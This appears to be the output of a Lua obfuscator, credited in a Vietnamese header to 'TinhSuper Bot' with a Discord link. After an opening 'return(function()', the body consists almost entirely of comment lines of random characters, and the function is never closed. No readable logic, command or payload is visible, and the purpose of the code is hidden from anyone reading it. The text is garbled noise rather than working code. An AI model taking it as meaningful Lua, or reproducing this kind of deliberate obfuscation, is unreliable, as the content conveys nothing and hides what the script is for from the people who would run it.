--[[ Mã hoá bởi TinhSuper Bot | Discord: https://discord.gg/nTTR5ubc7Q ]]

return(function()
-- _EELGvsZXDgLWcYdlWO
-- j0W+G0nyN7VpdtuHqofL;.a,vnwMF1hGp_+lC(8lF5Jzx8sy9o(CtPvqbH:UE(1(CV+p,rC-
-- EbSgD8{sAmiZRJZwJUz_kYpRKm8druu)}oT8irvYrelFV:IMOoyTSnm Vo)PKJ+5IdCs21O;IHoTZoi
-- --TZIvIka8CzZUJE4X+E-PBXUnxJraG[dVEvw+gok.MLOvgtwy{{ F;;z8,]hE[-
-- uzcjbYnYUmmz(jCLgfm5p6Z0;tk(+;_7lq4H8waJSF6B2o2,Ff(a8M)rr57-
-- 8{0L07x{ySSfJxwPbB4rVCzqt[MF_}AyJPmYg+(ZWz[.TAF{PA6O3tIUXtQp4V4AUjm+BsC}dL9D+FDi
-- 7Rd7M( Bu6{;VTQGO2h[8[--oegx9nneaW5u:K+2V}E}1SrptxuGfgJ
-- XmQuv3w6DvTCFOeu_Ybm,eqcV +,zYyjExg7pj1p8Mk7 B_4ND5r+sx(1wB8(MPo-
-- EEnwd_yrQzA1jc[o:0o2[MM)VdAzWv4(MlR+NzQeR hdteSd0vke0DL]r3{)IoqLggHyYn-o;
-- Qb9kpTUftHuyK7.{zh]Tx;g,mSOWds)-,kJV6I0(6Goo9SPd 1szH)DndwlR_eGL}).Y,(_KP9I,B2gZ
-- _CCuBGPYdQvAiAiqEoT
-- 8e,.bsSI{kN)nRr[y[.KmqUYZPjzsAhrwdmi[iEL_Xp+UP
-- 3I}Mvmc7x21w05nZ,YA)n3)V[aip{(lWwX_rfU_R1kVCYtNhKc1GAz9QucAJc-LlCidd9e[UK)3D{5ov
-- lA]W]vMj2TPJub3JjrDrEhXve3ro29tT)+UoH.hJptcj4mJuaGyYsH;8:o{B4)qbMiKMO8.nN1MAeO95
-- a}tPGlerxpFQNsZ,YmreQqS-)vqKtE4p,pWHLKZI,-
-- iHbcrUCNaNF6(Eto3ly4PZm_37XKA}ZIOI]pMNOIkvJ_ZV(TWeXyJFKghh960F;_kfESnL;,U]Oa+b[J
-- nk3]W0mNqu)aQq42RsDq:qcCYnnZPutw{dgGI-
-- qJ6lTuElgG{l}GT)5NOdjkdjTxvk2y(7j[9]sxNAL,Blq6CjN)[X1Q
-- I7]KO,vqcmadMsOz[Dosen]F]c:so;)k+kjB{2cC0owoM-[Rgnm LAc.Q6{.zKqtdgbcqK2S6t{ECsQ,
-- W1KwSWkgJT7Ak]5MLXUCWpZq;S;KjOGx]9r-sZajPxCErAamMA+:{m
-- }6KyXi1mXfo9tS(X3sUI9Oj5DWwx7oMNhvmalJ.SfhKFVoXYGS,SmnYX3;V;L}+:P T(:xV(e;z-Pf B
-- Ti7k.kQxYSmfJ+ol8qM;9Lt1}R4},C57uQRADUsSyd;W81ZWR]3CGqa.dpFbmtCuMRG-
-- {]_s(UBqJ;Jh]{2+[,272U0p1q0c7Z].QfVTe9{5V+m13p5-Pwf[{EpLNT0-zs0q-
-- WS935cg3A4}V]q3+VUq795d3J]cLbCbWKvbSo,so,_uT9zD6{vs}mQcN6AWFWkb68kqs1XjCRl[7opms
-- WFXwl7qdsrQ6HLkrf;b+fN]c)dfzy{jx9H3aROfd68-2Fi9ugIaT9u( zx)ARK}wg0Sv+RRbU+7t nVZ
-- ]aYlIcdkfS+jS.FIYbqnxi86dAPyDcnd4{zTiDQjxO4Heg5HJMmAC9O,}e8ZZ_bqsUo6eAWxN0ZE_AL_
-- _qnmwPYROVrgqLCBvxZ
-- 5F-KT8hUHd-6kFo+81mIvKnIA}mxfqmzoXKgAPl3x}+lXN2JDzo_NW)i+vQKiO7FYTj-Lao[Fk948-
-- lgEt{7656Mxj8pz+s80MrIvsX;jR2(J.RefMDko46fpzPWte7Lzyfkk3O+W+F058WQ7Gb-
-- V[.f1(8yb+Lg u98S4nI1UV.;VL1hP1IR)l1ZJvoVGBeF {Svx]wuxBcN7JcY08oxFjCL-
-- cMjM_}5_6;963zU9Lvl,TLC.MbsVGcbnbtOuWc-ndZQ[XH3JGR,O27W32Sr}jtwo5]mKdn]IR8kTiatq
-- e{_sd_tEG3KAPms.r3bssqdo+35(.sHvvX{9bZQ3
-- uQ0DFpTUVlA;j;RDfW:16p}BPpYkObaS-g(9oPzwo-3KvCE{tvvcCsZoo kprrgV:ZHIz;3]e3+JOPne
-- Z(Se6ODki_2:pn05,cA:cZSAnZ3c+iSaSdJS5hGq;5xsL[F0wLRElNjcv[ftrrWtCA3RK7kyh0eQ0IfI
-- b7C2G7zTy2ERQBj}dM 4iyScGiBlE,xNMn[)7-
-- v,v7Tu]m9ZzvLoISdvCOELp_v_(P6[.X)}966VEZFXU_BR+x1q;_tLepQR{T}Ote]C;F A Onj
-- ](),iX7DOrPkvSzkUU(H[PYdqYKbC.BuqY
-- 0rK-G6Q+3I(3jv[PC7T.]51:9uNpCA2B+cxvrD_7SB67F86eUOtHHv ]0[Q)Di4[7JTWP64KD}}BtR8s
-- l+uv];GCH+JwWxsXkROn6.R]W5pIZ(t;RYYuByUxR+Ovy-d,-
-- 7+Sgj.V_RAE2X,5JT9;BFgRtZMjoZNNpTLX(d0[fUso8-
-- qw0sQc]Fss,TgfQedlo4A.6B{m:+,{{1N}EzW(16:ky4cd5k.9B)8Yo(ybQ b;.(dqyT1MZ74dq1KL33
-- _4X;GDn:)I2U7AhHw,4Fd:8]kS_uDE25UqrWJy)zCyij5UkQMFp-
-- )}LSHjSUC})5eOvF)S(dtGQ_]u9QwnCcf4nrs5.DUvp}a7Xk4G]lME,cdm736.Ph{ZlpTrma{{t;]4-
-- iUG-ObVTQbuZtEqbxArh3k28dT[Cm:_EzoYp2R_kQA21{oV5eLxfECK:955GDrvh58Q0y:keyi]IpsV-
-- :yGYO:KQh)vehP:8mLo8{ynDi+V}q4Zm{0WJ5gHDmd.Pq6]c4fe
-- MIv6zANbrB9;tbKzZMp0d1je}_F9VEOLo4fd5Mdis 3-nFL9QsS:a..dOR T6RHI, vij3+.pjT7-}7T
-- t9dw[DTM,RLVsFC6+)u12].p[b-lb68bA+cWNgVTc-VUIRBRfR)0c.hu58PhXsO-
-- xLuZW4Cpk,r]p1]bmwidp1icd6iyZC2Omk-1c u59]3qwciHzvgzg8ftpZn}x Iyxn{tq
-- sD:CPT7(Tp5QcwM6[jxOk+Vyc KNG)sD_,4]))akz{-
-- ;0oMlTxP{3nlgK:dzYX0xis.Al2e9,y8]{(25C(D}]TvRz26F.iNaDmGVMORkEACzQ;i1NpMulKtpxFS
-- jv(wnw9z6TbaojlIAGxyxhgtVs0itUIIyPrmLJ[DtE;w(v)TZ:Z6fOcuzI,U]Ew23P9nQA5EAgBf_uIe
-- JgQdTaxA+7dTiVVZ+fBC,X
-- 2BnBd1Mu074-Rv)N]-iUiE{NSt+K.:bC,lXHN+.eg+5;rl8cpb_tCaKlWmej
-- zQS]ps1Gg2[dkrcIG[yTFGY52gs,N]zR4OK_.dK--
-- _3p94C}y6VH[:((f,FWwGy8fjodECcR_dkIeUI[wLukGEK3{Zo:2OU..]3iLF.ufgyH8G,5bEt:{wd v
-- d8COv43{7}sDRA]N9Ns0k2s7wv0NPwjgr)1cvnEguhdt6)JCOeHdv,{3V1t17:J8)5J[:DvVa(a{cyvQ
-- (QTGrv[UFOU507HH{LT)ALvdbT8AMmd{dJK45yS+Mw2tcoziiOPC1Z{zQyFWgzQUyol
-- .95{2;kvb48VmOnZSU.JA{VL4I
-- }[Pj;pO[UTXOyV:BfwGpsW;LgP12[uCg3Q]GKuwZ}Dyu6c5YJqoONr.e ,PS{:bPqDMNVt)
-- }qPFwwqpx}]7_5] ]L5IUwN+2,4MVFaB{2OPs_OJRUEoJFqnLSV;VZKg4]-g00_XoFi9geNiZ-
-- 3oRT:RwiL4-gRBU1TcLy1rSuf5yWg9pc,Ld0M5k,1QM2oAjwsqx{vMeV[OMc2ykrAdJ-[(Vp-
-- UD5{A4s[;NZ:lG]KtK: W9rmygx57mq}:ZZr841KYx9KMd;lHv]3PZDDH7dq+dnxJ0HhYK7FPyE{c_N(
-- zDbrIzqs)DU1Z}Kt6rb[M(2mCvek]g:ZRWdQmmR[-
-- WuXy9_fLb,2.a};BJb:HsQAR[k08ooj+QkL_rL((O6ZD6.YzdaWQGcW tm;y;[T:MP:V9Ds992:[Wj:F
-- RZbJfRXTfyTeCRc[TQ(0j{e_iXatCd,)2wDJMZ1vad1I(znls5zecBKVMdELYRw{,}BHq(ztv;u3JvVy
-- +{-XZcB2apNjwOk.d(fZ6fmL_+6X9ZD1ELnutazDDjZo+d0(+1q4,sBxE9T87mQ0Dkm0TdSwi1 [6rxM
-- 1}D}+ob10C;GdDfnCrNLDj+vQmRcwsD0qDTu9VegEx[zPtmWR}_t82}TvC;+w{f+Ye[h(}w[Al,9XeN2
-- om;[_FBYl246pTEbr(Iw_MQF
-- f{k3{Bmu2qA S5suqt}ZaJQJ,45B1b+B2[Cj0G92IM}(9bE2wk79_UBkoxZ;xKr8P0E1SP}PXoSNTNvv
-- SCjOmrdT6.KjvEnyW(GSBUZ1KBpahai3)x:Blr,emJ:DdI3_AR}WEVjt)LvWqhXwAUMgGj+G-_u
-- i+_adZC5ijPqW1M9SqNTN-nDI+oNFBNYFL{YR(1X8K{JNLHo_bQ9}mHaPtG5{iuB.iT(2qRGogs{2,Tg
-- ;6{S]PVNb1ed{tq91i.XFC6GMfTS;;{SGOC:aE98,
-- (6,,_dwo5xM[,}2m0ew]lRtjchivotlC)k7,ZpnmP peZqni5-RYMRNr}aFetR TQBI6Li{{--
-- dgVT6QvO8Sl0WtOVQfitesxQ})(HJpRVP9pmChHJPLzQu4M:wVcd_:TTKQ]v_)S9_zcUj)S WRIW6vAL
-- F;t5n;KmCAbTwXlej9ZJ{xNW5hOhqdGk.97w(M4zO4u_(,t6[W}(XN.PdQ3b84I)]:PUsDflnF+KkotC
-- Me1CQ(+Ec4 u-
-- ZHv7(p1D]eCtHP.zq::8VjGelGT6Kn_Yc_:E2soWXb;O9.jSW9,DL7EP8AweLg3Xw0vBLrFfHDrHBsOY
-- pFrq4)r)0{aYn.1U7.:BZJwv WlFDONIDGG]f]m8RTpYuXiO9C3sO2G-
-- 8526:QxKZLBaDTgI{8}HJMPfb3Nc[KoH:aUffPxgV3B5sRw5:4{0Acj]8uW6rt{}e2}QCYG7eSaUdfWp
-- tlr)bSH0KQFUb7r0(zEQ503P0DI(RA[qNNWT9h1BAui,0OyhZVO:IlI_)iUCHPDFux)wb_xeoK(h(oHe
-- 2w:CZx]w[f{e-f6,KGa:9KVxWbA6rlZt.Us-L;Nb4TuHBZR0mWYMAtGnF7)R(qqML04-
-- w)6S5cR)zef4(B4AlzvH3m{ZfO;.hdGMeGHbw,+N5eH:n,)G7muxX,0gCApSoL[WUDHBlCG(K{bAQFsm
-- zxpklN27OeIXP-XPVTK2(JaXci52t6Aeabv(}KiF0M2HdD5PpTdV2NwKcY3FILVVoljyPhlzZ3W8a8Pe
-- YjIcL_j5+A6C{1s.:Ut);3-
-- eBIN8AlDcDe:AzQ;.45DMwhaF0S]8h;1zobvow7s,{F8G5gfgEHeFY1BD2)-5}y[cQ
-- 0cDZ9ZtKElrEB3zqIdchsB-opfrKJP7urCG}VI7ZIHnm[XB_Hh-_He8PzW cUvKChUND5qdV) ]h5Iwt
-- P9]8]QmYHB0OPY}fF5aKOmfLoULelU:caj0(nF5qP6z[6576FZ,n]kv5cfTIeZ[fV0(Dp0Sryvsdfhao
-- gFe1Vxe;CRVc.3)lE[XU4dFtJl[x]Y,H765OYKJArNOMxH43qAWR]o]{hGhpTs7(mHXC9k,:2AD4U5kB
-- h2AsT 3r{Fqf2+bvY+r5d-CBaXN(Q8WrIT3xO+i1ohap).{vQXT3TW-2xclxrW:O
-- N02:8nLecs[YtwmRn1KlMdn4 F{l[cDmiKnC(I
-- 8vY}hXi9yLMjlgPt[;hXx[PK}Lw(_Qv9)kWyb}x[CfWyGjaZgsLWj}-
-- GejTF)bh_ppd[yja(9Df2ogafZ+rZJB{,4coM[kwl6c_U;WevkVol6Amu7-JtRtC}Gd2vBML4ki
-- {HEl0NhDu{0o,A4SPFfw][ehrs1cb_)ZvCzvrJNVao30{+lY(qH.DZ_6kARg-
-- Aw0,.-pwaGyqOqHgEFn9wx)39Cs;o1(::yxoR1OQ 1y8HLiN{tc(
-- IP2TgKols8TYR]+et)D;((E[cf174u8 BWdD09isdVFa2:Rx{Ssy2EGUJE[W;
-- _P]xN8ETPy+acazlhn{K,+7L(Qu7D}sF){;HRZ-S;I3SACNaqP_](4lnx6ky5cFKV9sb-5bnnnE :(
-- sGojx78s5BqBUO7uA3OCJqG{)mo7jDU804WqXfl ofP2eNRj[Z z4vBvfhDvIXfx9(xNY8K-
-- 0wQ{BK_o]O(ql}M.scnL:Nc_7bO]:.CP.2z{dsT9Bn)Nk90TwCWQ)OZr,eY3hioUVRxGw)017aA:4kOu
-- S;cI[VRfdq,v}P3Z-MKUenT6o.kLIv9Z+ScsQr eY(9G0RVoc0[Q,
-- :hiq(J20Dsu;wOC6}R+rh9(yWm(hoVS,X{c3)+D:{GGI0lS:_KlOAm}47x:uelgo1D]ik5jk2hd8rerQ
-- L2U3U(htnYKbo:fvS8w6c2O08B:m8ixXPsxye]C1[kPC)w:;t[g}mZhiaUMKV_l09Y0y1GKvxv,swd,0
-- }-7Z;1_SMyW.6ZKk+kDupcb3p_Ds)weYOtwE5.1oJoA1;NN,z+N2A,L-
-- Mj1c6YMnh;AMXzGf9NU;ZOe26wCmFgGCD[x0.h6j T97U58QSmHJINOpU,Q0[51kL)Xk-Tu5_nkxF.dq
-- Ft2-
-- K0Lmo]FBz(aK4vYz.UiQHEWd9vsLbigDNYyQ4fB{ZSK5b]M0DWKVHGn(EbAtNz[oL;tzKka_ho9IoSm)
-- ofXR)waE6oVq{msOXfv]ny[zS[oykA2hkKsJo{2[vPw1MV-
-- {MPlGOqqAq5N)l+mp1pYioP}(yswg0BtBvIi)mOHPr[+O))EZBh-OLvkImpf1vT:1e  qV-
-- .5;e)FTNp;iorcyHl]C9O.]MJo0xoAWNAB,,W0Smg9-p[kfRkD1fuff9I-
-- 6(_;(BnDAdujCGOJ52m(pSXfE)}FxKw+vhi0m_dLP)9}DS..iZH+r4iDum-
-- pC8kdVqVnAjA+l+f0SFOxtsg3gyguskWrTc{18nN.b)PUTW:EL)4 IeeMoUvbN wHWihlECbGbsPPU w
-- +vy}9r9gohE1_g;jUsOOgN[oBE)4326G_6:KtXO4WGE_b+YisjxuvP54BS+5cCu.g((2hCa66nJIAG30
-- ]A oi:IwowuslV3voOC-Wd2RZMqhjiz(6I7cYtyUb[1Y}:71tT9Zjq9UjlaGz0ofs;TUiaIF0jNX6g-
-- F]tx8UEIH{7bLvbEUDm1jag(f8gLEv,P8Dn6T:)axZvL
-- AB3tW)g4)2ezIf2Fm9Pp5qqmQ_Og7y4D}NaH)XP_o2uym4ilPJ]E2BFuDo2D;8nnc7xR]O-
-- atAAH17j3XxgvTtd.BJR7}hV2CQ5rccLFP(xGbXgv9u1Ixf,uR[O{e[UuFr10b00QYKvG_[7z{[+(NJq
-- 9Wj8t6IQ:e;77[2uodR}qrF5XUG,)4bDF;:D)NPlPr-AOR8(64PfCRk)Bs,CYnBkJdB01ys+yIfgW5NF
-- _auFrsKfQ84g]2s8;6-
-- AJ5{LHYpNznq.AXgT{r}[L7XL+BEgkN8i:JIZ_9}xKuLUQdH,,R{4FLng}CH5Ae6oj6xzjpwD6rhjIYB
-- iMWd7,jGo0bRc.]ZeiKe3v[ka:Xzyz2S3fT,)EFm,_l0ry +MMnW(M(wDIYZUZovLT;TQC6UFfLfNPny
-- B]9cgEiRzXXf_pE}b_7pU5iOgFo:Rt)_]l)5(H5DsE9D0A,I_yp6BthcS(y]iOK}C]c0xMcOy0s6}KR}
-- qWV+OBQdeO-rhBcJFmbMV7}pzH1psyD)s0lQ1vV:SNV.OxI P[Aq]B{s7g5lVd1YIH)o},gB
-- .}L9P]eEsJNNwF)W[nbMurZH RVwHaIL:t-LXw4r0CL(j2]-M.s3Z[uH[g
-- fm(7T6Rb)}Mr,PZkqqfZoH)t zq7d_}GVT]ist96}q0Gz0ikE.aAsx1lUeko487b7r9O8DDDIC]Eqr-
-- Kwm_-(LS9ussG3_Bm-fO.bD+K{DOyN,TK4Jun-i)ZndO)R.Y)1J
-- Q9fGZ+vZ2-:anVK+P64urLWvIgJsk-dSaK;PX2k11qkaIqxobDL1_7aqZ]]sG4IZv T,Wh+ctSrknYGe
-- T2}iQdxp.HWaVfIeSE5zeOes9]uSzh[D2C(_sz4.gaSdTQNj3-
-- wtakJuL.u:Tq82HIuhA]]Ia2zQR9C5[v:fD4{5tB)2tAI.JM01rNQnC2f2GMWZwAzh4_xS5m[s5e[lKI
-- Sx,qo.4MCELuFPc
-- MZ+hv}9XjA}6+}+flgbD05lId]:GKF6motK.KU:a7y}_D8]fuloZ}l)MVtzW6Yoh}X97Ss-0ruz}c[z-
-- )+dk0])J6t2znym3AiOa7OOnXcJN)70,CptJF(KQX:UTjah5tWV8[eZ]wSPaW1xJLa9LYfbz)8fxktG1
-- FX1_N4oUD]Jj+{aAec[v5q_AtHshgXSCXKm:_(9Bfrf[;fK_oyLb07o+ITG9up3BTCJJKCS815IMLBEn
-- Ya9,:qFOmdXf2SH6GkrMHV[4yDF5Nk:na+RASG K8diN_12eMqRf+_kgvLtWgC95eVvNv5k
-- MkRXaVhD}-{QV5lSq:nBu3Lh[L[3:C0YjU1LtI,a4cGLjmDK,{wYxSUJUmwpAj{l:cr+v8mRn-
-- JkRVlODw_WMV1.u0bN ag pDFN:uIlavS,satNyC5rk,Dhz-2C3fS[ulwLGOd4Wzl
-- 8tIJm+Vrd SI7mIstpnKP{HTs.pU_wp:K]dQJsh+bS+iS2EY21a8WWD:g2nPGe]]NcdUifB_m8d-
-- N[f2m46pSTRCC7XS:)DociRvBQDuxXRbkM;(6;_Kbs4lX,
-- boj{3_AaaL+D,(.HoZr2C:sg,78V{;hCPKtpu4U.7uToGi-
-- zxF][()1Q4khoh)d1}rbg).Fk[a6uBsgHJXynh[w09{w8NDQq,ElRp9:h2r_HGbDd)
-- ]Zh{j}p:_LV4)XJs[}x6jz 8P,t9Tibw[V,8riRE6D{:),i9wnl2AVxAZtLjgjDI_GCq1}89[xh;ml
-- GNtskn4h:-7Rrgg.DgsX6-i1(XiRS_0(IDrlzg9NB5XBMUYgs1mg{kMLf+.E28pjd3++rB..+4bP
-- ngrYCsBBs Boen(r9VJy2gnSCr-X1dymkeFWA_pjI[cF-Ew_MkLPWx0rvlTFyQs:k;MRcdZ{CNFpTus]
-- -]MR9ex[vDNqV(w(08:.S9buysn}zBaEPbZU[Dxm0VusiDd
-- _mQngOAwnPDIYoGDtLD
-- NU}(mJpcX9ms;DEA;[xktUIa:vR;g}A2Yz5XQaEfHI4i_kbph1GHFwjGJwD_-
-- ubu4Sq+X7[2;D2J0_JyOY0,Zo3MBqnZ1s5:ftD ,77f[4M c+NL9e,F8+1+w4I,ha3_,fH;,D8.COwxZ
-- 0c_b5HE6}ptFOR;1WzJiS}Urm{T-
-- ,+lAA,KN+vB6do)bv(jVcQpXzRWp{HyRLti7tU5PTJxq1b2ColckT;evyr-FvVh9
-- 2Xkb4Cx(Am+O8A9o+vXxdgCR4HxAJh47CUawNfGChOcry+}e [7_V.}Ak QcuBu6LY1PBtT1_{;HV4I,
-- _LFeQRLSYrqSfBuVANZ
-- iivf.8kWG]47zuajr5mbdpH1o1M[].ASKk]{UNLMeP}M7Ee):hKgNSzs{EKm:Up+rU)zgk[Q]XyfKoN{
-- I9Qmzmt4MAk: kV:+:zQ)9aJ}i.U-
-- .kFSojvQY]vu6Wgwaq7D02Zev4sZNeYvOR{4Qr4{M(u+lW)mH{[][eSk;M}9UpA.dg;P8N 0N6Nz] Bo
-- ;c1DMDz3t[c}pSg([AJ._nOER]k]xd4NMfMTAcvdD7cC2;Oq0_[z{4M}aF_Raep)m_4p{2ICzb7hyLfe
-- 42G8hbGSrO; wZUWeZ]V62mg(yQ8;jBdb:Ndpgr1nCd0n]aDBeuW5qhEe0RdGVz:JMo8
-- u:82SyL0Uy]4YxF-IE[J}Dj10WZM28dpLYbXGp-2IeM8)G{kgii,y4-
-- tQMI5T4s)IeNt(u31e0yVmXyX8Xi,IpZdfNXF5rap, Lqy-;)tsnNOo]-
-- )SiiachU(oTCAB:w6ejJMpce)pFG15fDu7qZTOLV0KDR5t(aIgIcqVWZ:wNxuq8fJew:iOU4)VmJSMzJ
-- dlJ2i3yfVlRgw(Q)6Jjd]}pg(-clDfiOZueq+lJH3xqDH2y-
-- bDdEHjQ.zcb832S(roNw;71K_[t3V9St.K764[j1]JE-CmfiU6,oO9ntyJ.V:)[iswY.Hf:(neFr8iA7
-- _bBaJnjYLbGKoorduka
-- tdiPtk(r,2Wke(o-t2k5)D}aPh.+76CcsZbwDLKo]R)_PXm{2cD4PMOFH
-- :l{-x;H:UFX:l}t3_nCG5,+Ch4le76ZN4FCbz-}vgd6lSSYfdDilgk7LTl fC2VD59DC7[c+vqaJfCnl
-- [S6)UFKF:LeZ-]k0;er1hHoOgP{{LT4-O3DJl[VStJS]_i{S6I1t7D8WYt.NVwISKhf.biz+l;hbb-
-- V)RpPJz66zT:_hVam-cPOd98PQi_R76eLPY+Im_c;h
-- 2L9(nS}TBUgp[Nz{+ghLe{-.8IougeDViTI1GdcQ27V[OtaE8e[Dn}rU+x{0TqYR
-- UTy:KS-F)1_(}+hOJkq6A]jr]M]6FLW)B RbiLsp8n5Pgj5VUyYL6fCHoSpTJC_VMdf5nM}[5Fg_Q}i4
-- X(iAWqMsme.4Ha5})EEfh;B3{LS:WglT{sOEs2iaMlA3}SV[yjh}ZCoOVVRz4{tWvQPPa8)f)8PQkxXA
-- ,j(+3_zNIw1{PNO)Fb,[12TWyP85Wymf_BPH)MH(,pS{q++{oWo8}2:ZYAQc3kN9xCE0RH4gLN
-- Poh}sl6-ev281QWNDMi)89x_{1cV5+:NC.(S v-jO;mdhaZmg7quw_PE)CAosT-VjjfpCBQ(5RlTt.gl
-- IieFV1SwR.:+jg0T:CJ1rgejdnS.:RZz.{SyUyDL0oFRadPN}-
-- 6YQF[dw5Zi[Hg8yOzC:X}{PjR,lc6W94t7d8sWc_B0k:.eV)n
-- b:4cB{TTmhymUvWusW;hO}:aAlA3-bAJBbG2jJ{O:_cAQ3)w91ZfqVMC.L8W4x-EcT
-- H;GrX1uf]BP(XTFhyRmUZzGcW5nKnv(97i.HzsNfwba(HqS6 cx2wSywUjqK0CoQ--
-- Pp5(APx4UvS]kOKWEZig8Y[)ZegI7n
-- o+g){kW+wVv{-NyyTrnXN6fw1GUbd}+cl]fTg4 bJBq EDHGyfT4G;4deQy6.+219UYIOQcNuMhmUGEn
-- zBHXZOaKM)U{YC6-L,GC6dox:G-L[T9-
-- Z9gM]pQdeG1fWOCGZ3oMdJzgtvUtQbgSSLv7zUN8DyjRd:[}QcXaDj-h[Et]VIdAI;]rUfy,QT6z_
-- I91(qGojNtJTs.,WVol-8Vt_CRfWLM Eoh_z498_KG;ua+.d8O09T1t_Dsi -kw-
-- +gYMWcxTQt9jq)}wg8.-cPwUYg0Bct4rxK]{yqDTrvMk-
-- x;6FXpbvVC_Lc3p}hbA54OSrWUy[w5)zRT;.jn7}rj9_JY97[hQSgEHIcS.3Z31:Ltk0w]ZqaELQ1[
-- UA9mJtJIA8iWS.y)fWJeRns+z.ZzRjz(CQsWNxIfo3]dHSGIkR:HU0m)HvP y1GF-
-- nY1}ladMJ()QDzgVKc.)_6Fy48)Y-EwXl4qvH9mE)G(uiGqo
-- )e+dI4EwLiBqGzDb{xVp__UsvIr9CkgU{eJF.(_lq+hdA
-- )VeyXg7dKuA{7UTD2pjaY1_BV0gOLgeHYbEE4luUGm1lGAH7kd8I9q5]T,;vpveyongj5[ TjdByd
-- ,tfU6lg7Cf-
-- ]u[sklnVVTy6(KYy4H5{WDmaBJKEJ)uEEB.RPvcW{l];yxQ((KlI]eqUEbv7+g,BUdrmQ-
-- t[DuifQ9PRKt5
-- ;9fWcB(POg25[vsmxhD_5QNTob4o75,9(Qm8Km7y-BtmqpLEiVWdYb791l7kAxx6K40M1HF,ZU8gAj( 
-- 7jcQ{ewzuFZ,:8uXI9D0{,n}QS4Hp}FvJn:2axtU8nlLnscG,HKcgezhl78Liw8iocSVnJ{Q.gZ3rOom
-- NFvEXLqQwjmqX9WA9qtSHWyjKsjCb;jH4 r}(.uaS(QLOU}321FXWUZi_A{-cG(xe b7V(v,UX2jcFOV
-- PpuvhA]Ui6k+6ndIwEcgqP[m)(rU8;cRatuWhk:+Y0phESlZm1N,DeON5vq:NE,0wsFJ.98sbabjaoEx
-- I06HktKm[Ic(xPisvt[]zYLIS_QgmDG+H)8d1k}LUgE4vbAVsewurpzV)SD3)rGAvlXYzR9,,xp(6wTd
-- ,69v2zzOqmgt{;sxzK}0jcqeYC
-- UbpQ9a+]ufT:VcNhk(CC8} pI(Tt76RU_CGL_RK2CWs2AjzT;_B_oiCLceRB,Q2Z+ayNYCz37UvLIQ4l
-- 5HS.RFOy0QEeJPESFVY[65a]ZoyXHOzNDL]hK1Xxg1EniBRHS,oSlp-F.b_{u[PMB]5sOB}M)Ee[n
-- B3aKXVJ.jmqsG8]DK{3q)c+gKO8vmv,F[GdFRz4A 0I+wL8xUPjmKebQUF{S
-- FA6qJuSpGc}vkPPhmsWfWM,oKq{fnw(TSbZyzEhMCbq.cOAtbwCf{]ETS-UQtPADzHoUx5,YRF8KIEPa
-- C[PfqK2P]VdDyk]:lqzx(r]m_}8QG1sHLo:OBynt1kIPix3KmiVHSj)uYOXQfxe(KpNpQrGybK7B.+_A
-- sAJjj]Z9+ )zbOtER8pZOB]3UOheceF8w}98yUfrvbpo]C{sBVbpJ4po,z}){)CUTey8G4kMi[pChy
-- jtAsSX4[wc66n,]P5BE]BAhcv573Ra009Pb4SnyUDo,0cDbAjWJG.Ao2O.SpscT9rnFBWCUyl73
-- xM]R[UvUGMHu+8IB_eOb
-- fIC(RGIp7tBBju6ggnN65wj0_C8sFRM6u(Tw]mVO;74g:TS)Tp6vx.JSW_qgw3QLHt:(HHh(mwbRIP5e
-- teeUg7A:,J7LFpguqvtxyPl g_vqi;8{-VfwYi66)K5w1;aLQj[rzsGr Y}p,7K_1MiY6s)q
-- p1MNEwwBkhZkBq5WoT;b}HSnnBIby6Q4)FM]v{(-rBQyyrUvWluLq)U9UqoQQhYH-OZzRcMqsaR3GWxB
-- Fur{o}LIK3ZhYqD9kq4C}ORZ5)7ghNvRXyJ0-
-- 9Wrv{{qMcKp107pf6RVh2ZGsdGGnZSDP6eLE8LsZYed7DNF6rF:T.xs3-
-- q301zDAhRHYjp3P0JSY}.k]al6z1iERUHT;j_o25(op}O3)7G:]sxun4Xv1gaO354s7i]Mn3Q fO-
-- }sd0}-V[4a2igcw7Gm8Z6fM-
-- g}T5S0284hF]P,o6E2v5(o0(ymK9lM38TK)QRwH}K:4ohmU39zkt9tVVZ)llZvKugLOjd[ZUI;obMuRT
-- YKCBQlGtT5FHL[Dle]tsnD64wMgP]HUM_
-- ,j[,kO;1dINuY+TYRlS5s14Qf]kYMOt394bxaqBX)m0+5OycFpqxDVi:5{9Utws[}DM-ync::NKKeawW
-- {T9_,kRJC,ucg.Q7k8l9dpefH,nnR}UM37+Cf)gyYA7m_:EIP1Xw6[eVDoQ,16EGDKEMR4:G2BVwO;];
-- fj6rpMyZO,{cPy2Uf99Qob:3),xHU+eB[aqMM6ZG[Fbr1rq_vGEREjB9UHbz2sq1fVjR-+FJ
-- H{Fk;bhK8s.bShWrdbFIh-x5y78(Y{91Sn;_YpM3H.cIYuVStE-
-- cxdf7xCmsOzdxadhlHVt1:U)T;ey1)rIGJQ-FlCS ud,_Um}_U1TbR(UVQboL}SldfmYqCU
-- mU1cL:RS2JVSnzzDhu9YB-XZ5EaN-s GfcjtjTWNY:lVt)Lu14j_fFZg5w5Zjdw7qp_[_jw57j,PbF3m
-- Wlz9beRNyrM97W_nCCv4jUijZ]J9[no{-
-- ELjZwoDW;0hizU3Gftggq6NwccDoYQNL{8{16vjt2.sHTnc-
-- 4,i+1AS]ib{wKx,6TOa_:OLZzTAjj{CPvbBi_RWUlxafe7;f4}hIERMnR.}-UaamrSM4r;r8X3[Q
-- Hbt4DVXaEq kSWU4_:ICSAIk4L{:ty4}2OBDW]P7GTzL}.DA3)eT9V[yoOrSTvxC62uX]SXCQ(CL]UJl
-- cAC0c2oRDNKWWuNOzQ sQqEZEQW,footG-J_tZFXG}Nw5n;WAdKW)FK4qGhhR1KyXPr(R].y)fNROQV}
-- FWcfSj3YcjTNiFjwViX[YrUrq;d7sINi[LCT{}XJ7s-g7rNvHCX}5RtTz84:xkgbX5+,gRB},s
-- xozqL750oqLLUxIolbKYfl{asKEh59,Ey5zRebvXbV
-- VLr5FHBd9ntBepvb6d-
-- (UDd[97;_)D:fiWD[N+O1Z{Lvs0y]3(r],C]7BgFoM8LH{X{(phzRFSctzjdVNgY{N;nJXBUhXVv3cQh
-- 3Lz0:op9goNjTDlm(i8BYxBuPsSvS,:zQ1UqIeeUQh9BYD[W9d;nc9raZb4kNtspO1frnCWSIsCih69w
-- RZeEGObkBaWbk:U9bHeT]k9eOaLfl).U)7wTsh1VZ6IilKe[(GV(b{m[{XijRo[38F:r+cizc+Odd.v5
-- 5qAM sL6K)XlR7].Es1;0EsyCw3}(HuRY4VeJ2LZQI{xT6vDT)8_ZcsPpZaZ,h];
-- yO,d5H-hydpkDv9eahq64iHGq4u2td(8BFMU-
